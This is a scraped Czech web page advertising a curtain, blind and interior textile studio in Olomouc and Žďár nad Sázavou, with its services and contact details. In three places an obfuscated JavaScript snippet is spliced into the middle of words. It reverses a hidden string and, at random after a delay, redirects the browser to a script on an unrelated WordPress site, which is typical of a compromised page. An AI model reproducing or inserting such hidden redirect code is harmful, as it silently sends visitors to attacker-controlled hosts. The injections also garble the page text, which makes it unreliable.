Rainbow page separator

INTERIÉR MARCELA KALINOVÁ

www.interier-mk.cz

  • Prodej a zakázkové šití záclon, závěsů, rolet a doplňků pro interiéry
  • Zakázky na klíč – návrh, zaměření, realizace
  • Designové poradenství

 

Při zařizování nebo i malé změně a zútulnění domova vsaďte na textil. Máme dlouholeté zkušenosti, v roce 2001 jsme otevřeli studio v Olomouci, v roce 2019 pobočku ve Žďáře nad Sázavou, vybavujeme byty, domy, komerční pros };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory, his };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torické budovy, hotely, penziony.

Poskytujeme odborné poradenství, pomoc při návrhu interiéru a všechny služby s tím spojené – přijedeme, zaměříme, ušijeme, vyžehlíme, pověsíme, po dohodě je možné před pověšením zajistit i profesionální umytí oken.

Dodáváme veškeré typy kolejnic, tyčí, garnýží, včetně montáže, případně demontáže starého systému. Vybírat můžete z velkého množství vzorníků - záclon, látek dekoračních, zatemňujících, i látek určených k čalounění.

V sortimentu máme stínící techniku - rolety, žaluzie, japonské stěny, římské rolety. Na míru šijeme by };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové doplňky - polštáře, prostírky, podsedáky, povlečení ze 100% lnu a vše ostatní, co vám zútulní domov.

Kontakt:

MK Interier Brněnská 34 591 01 Žďár nad Sázavou

IČ: 71885862

Tel.: +420 702 006 181

E-mail: interier-mk@email.cz

Otevírací doba: po - pá   08:00 - 18:00

raději prosím telefonicky domluvit, můžeme být na cestě k zákazníkovi